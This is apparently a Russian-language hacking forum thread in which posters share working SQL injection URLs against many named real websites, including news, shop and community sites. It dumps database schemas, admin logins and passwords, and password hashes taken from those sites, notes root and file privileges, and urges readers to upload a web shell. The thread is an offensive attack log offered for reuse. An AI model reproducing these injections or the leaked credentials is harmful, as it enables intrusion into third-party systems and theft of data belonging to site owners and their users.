SQL Инъекции

Prospect-magazine.co.uk
User: prospect@localhost
Version:4.1.20
Database: prospect_master

Code:

http://www.prospect-magazine.co.uk/list.php?category=131 UNION SELECT 1,2,3,4,5,6,7,8,9,10,concat_ws(0x1,Id,Email,Password),12,13 FROM Users where Id=90001/*&allIssues=1

содержание таблицы Users

Code:

[COLOR=DarkRed][SIZE=2][FONT=Arial]1
[email protected]
T91P73X[/FONT][/SIZE][/COLOR]
***************************
90001
[email protected]
boutons

итого логин пасс к админке

user:[email protected]

pass:T91P73X

 

Внесу некоторые коррективы:

, т.е. столбцов 26, а не 25.

Список таблиц и столбцов получается так:

Code:

http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.tables+limit+0,1--
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,column_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.columns+where+table_name+like+char(112,101,114,115,111,110)+limit+0,1--

Так же имеются и другие дырявые скрипты:

Code:

http://www.fondsk.ru/article.php?id=1505+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
http://www.fondsk.ru/page.php?id=6+union+select+1,2,3,4,5,6,7,8--
http://www.fondsk.ru/articlelist.php?section_id=2+union+select+1--
http://www.fondsk.ru/articlelist.php?&section_id=14&mode=brief'
http://www.fondsk.ru/author.php?id=160'
http://www.fondsk.ru/articlelist.php?author_id=6'

Список таблиц-столбцов:

Code:

**********************

	article

----------------------

	id
	section_id
	author1_id
	author2_id
	author3_id
	title
	subtitle
	keywords
	body
	flag_hidden
	date_publish_ru
	date_publish_en
	date_create
	descript
	imgurl
	flag_hidden_mui
	tik_id
	tags

**********************

	author

----------------------

	id
	lastname
	firstname
	secondname
	fio
	prefix
	suffix
	title
	bio

**********************

	comment

----------------------

	id
	article_id
	comment_id
	author
	email
	subject
	body
	flag_hidden
	flag_approved
	date_publish
	ip	

**********************

	content	

----------------------

	id
	title
	subtitle
	body
	createdate
	type
	parentid

**********************

	page

----------------------

	id
	name
	keywords
	flag_hidden
	body
	sequence
	url
	flag_hidden_mui

**********************

	partner	

----------------------

	id
	name
	url
	flag_hidden
	sequence
	flag_hidden_mui
	bannerurl

**********************

	partner_article	

----------------------

	id
	partner_id
	title
	subtitle
	url
	flag_hidden
	hits
	sequence
	author	

**********************

	person

----------------------

	id
	login
	firstname
	secondname
	lastname
	newlastname
	birthdate
	group_id_before
	group_id_after
	degree_id
	married
	sex
	jobplace
	jobplace_show
	industry_id
	position
	position_show
	jobsite
	phoned
	phoned_show
	phoner
	phoner_show
	phonem
	phonem_show
	email
	email_show
	homepage
	country_id
	city
	address
	address_show
	alive
	status
	interest_prof
	hobby
	comment
	admin_comment
	children
	webpage	

**********************

	section	

----------------------

	id
	name
	keywords
	sequence
	flag_hidden
	flag_hidden_mui
	type
	imgurl

**********************
	
	stat

----------------------

	tm
	ip
	useragent
	url

**********************

	subscriber

----------------------

	id
	email
	flag_hidden
	activationcode
	periodicity
	flag_hidden_mui

**********************

	subscription

----------------------

	id
	dtstart
	dtend
	status
	dtlaunch
	mailsent
	flag_hidden_mui
	periodicity

**********************

	tik

----------------------

	id
	name
	subtitle
	url

**********************

 

охх.. лето лето.. .DE ты? ))


Dfki.de - PR 7

Springer-sbm.de - PR 7

Gfbv.de - PR 6

 

http://www.vashstile.ru/profile.php?id=-1+union+select+1,2,3,4,concat(username,0x3a,password,0x3a,id),6,7,8,9,10+from+users+limit+63,70/*

Дешевый модератор бесполезного форума
login: Admin
pass: 12345678
Пленный сайт...

 

http://www.garem.ru/
Сайт проституток и знакомств если правильно понял.

http://www.garem.ru/act.php?id=-13+union+select+1,2,concat(table_name,char(58),column_name,char(58),table_schema),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+information_schema.columns+limit+0,1/*

Сорри времени на разбор небыло да и кому интересно будет там осталось ток таблици узнать.

 

Behindthename.com - PR 6

4 ветка..

рут..

пассы...
пробуйте залить шелл)

Arcoiris.tv - PR 5

подобрал таличку.. вывод в сорсе.)

Inst.ru - PR 5

Freenameastar.com - PR 3

Jets.gaiva.ru

 

http://www.nord-east.ru/index.php?id=7+union+select+1,concat_ws(0x3a,table_name),3,4+from+information_schema.tables+limit+0,1--

интересных таблиц не нашел -(

 

ToneZ.NET.RU - Мелодии для мобильных телефонов

version(): 5.0.45-log
user(): [email protected]
database(): u14145

Список таблиц-столбцов получаем так:

Code:

http://tonez.net.ru/show.php?model=4+union+select+1,2,3,table_name,5+from+information_schema.tables/*
http://tonez.net.ru/show.php?model=4+union+select+1,2,3,column_name,5+from+information_schema.columns+where+table_name+like+char(117,115,101,114,115)/*

Таблицы в базе:

Code:

_pictures
authors
baners
bannertext
catalog
content_sup
melodies
mnews
models
mp3
mp3_pictures
mp3_trash
p_authors
p_authors_copy
p_authors_trash
p_melodies
p_melodies_copy
p_melodies_replace
p_melodies_trash
p_pictures
p_popsearch
pictures
popsearch
voice
voice_trash
accgames
brends
car_fmk
car_img
car_info
codes
countries
firmbrends
firmparts
firms
games
genres
kpk
operators
patches
ph_game_images
ph_game_phones
ph_games
ph_genre
ph_phones
ph_top_games
ph_update
phones
q1
sites
subscribe
subscribe_themes
subscribe_users
targeting
towns
users
works

К сожалению, для доступа к самым интересным таблицам (типа users) не хватает прав. Жаль, ведь счастье было так близко... Может быть, здесь:

 

Miraclemileshopslv.com - PR 4

Datahop.net - PR 4

Recko.name - PR 4

Mobilegamefaqs.com - PR 4

 

Nemovitosti.cz - PR 5

5 версия..

1 таблица с паролями..

2 таблица с паролями..

3 таблица с паролями..

рут..

file_priv y


Ewrc.cz - PR 4

5 версия..

юзерпассы )


Vzlu.cz - PR 5

4 ветка..

админка

Pragoimex.cz - PR 4

Tvm-valmez.cz - PR 4

Magick.cz - PR 3

4 ветка..

рут..

file_priv y

 

Code:

http://www.myspacegamesandvideos.com/ajax.php?rs=__exp__getFeedContent&rsargs[]=-99%20UNION%20SELECT%20concat(char(58),uname,char(58),password),2,3,4,5,6,7,8,9,0,1,2,3%20FROM%20users--

root:7c49f9a7e14cb74eefa0e34f7fd09eb4

 

http://www.cstore.ru/

version = 4.0.27-log
user = [email protected]
database = qwe1rty

Не смог подобрать таблички,кто сделает это, буду очень благодарен,если сообщит об этом =)

 

http://www.cult.bg/ind_dotCult_full.php?id=-81+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3

User:Root@localhost
Version:5
Только чето сайт какой-то у меня медленный,замучался крутить,так и не докрутил
таблиц со словом forum около 5-8
----
Ресурс очень большой,кажись по кулютуре Болгарии,я бы с радостью раскрутил НО...

 

Rave.cz - PR 5

5 ветка.. вот и таблы..

это хеши админов..

что это за хеш? тоже админов..

вот это уже юзеры..

и еще юзеры..)


Clovekvtisni.cz - PR 5

5 версия и таблы..

апликанты))

каких то 3 несчастных юзера..


Cagi.cz - PR 5

 

тИЦ: 150
http://www.componentace.com/order/?id=-4+union+select+1,2,version(),4,5,6
version() - 5.0.51-log
user() - [email protected]
database() - componentace_com_5

тИЦ: 150
http://www.taksa-shop.ru/index.php?id=9999999999999+union+select+1,version()/*
version() - 5.0.32-Debian_7etch5-log
user() - [email protected]
database() - taksa_shop_ru

 

http://www.goto.kz/content.php?id=1'
http://www.yuretz.ru/prikol.php?id=471'
http://www.fasie.ru/index.php?rid=1'
http://ocenshik.mostpp.ru/anons.php?id=1'
http://www.milim.com/news.php?id=-1+union+select+1,2,3,4,5,6,7,8/*

 

Expats.cz - PR 6

Cz-usa.com - PR 4

Revnice.cz - PR 3

админка

 

PareO Шоп

version(): 4.1.22
user(): alex-sport_pareo@localhost
database(): alex-sport_pareo

 

oculus.ru
PR - 5

Code:

_ttp://oculus.ru/stat.php?tom=-1+union+select+1,unhex(hex(concat_ws(version(),user(),database()))),3,4,5/*

oculus@localhost
4.1.14-log
oculus

sweb - поэтому инъекцию крутить дальше надо через POST

elportal.ru
PR - 3

Code:

http://www.elportal.ru/stat.php?id=-34+union+select+concat_ws(0x3a,version(),user(),database())/*

4.1.22:irweb@localhost:wwwirwebru

и на последок поклонникам DOOM3
pr - 3

Code:

http://www.doom3.ru/stat.php?id_rubr=1+and+substring(version(),1,1)=4/*

вывода нет. версия мускула - 4.0.*

 

Доступ к таблицам есть, просто например users в соседней базе лежит:

Code:

http://tonez.net.ru/show.php?model=-1+union+select+1,password,3,login,password+from+u14145_2.users/*

Правда их там всего три, и те админы со странными хэшами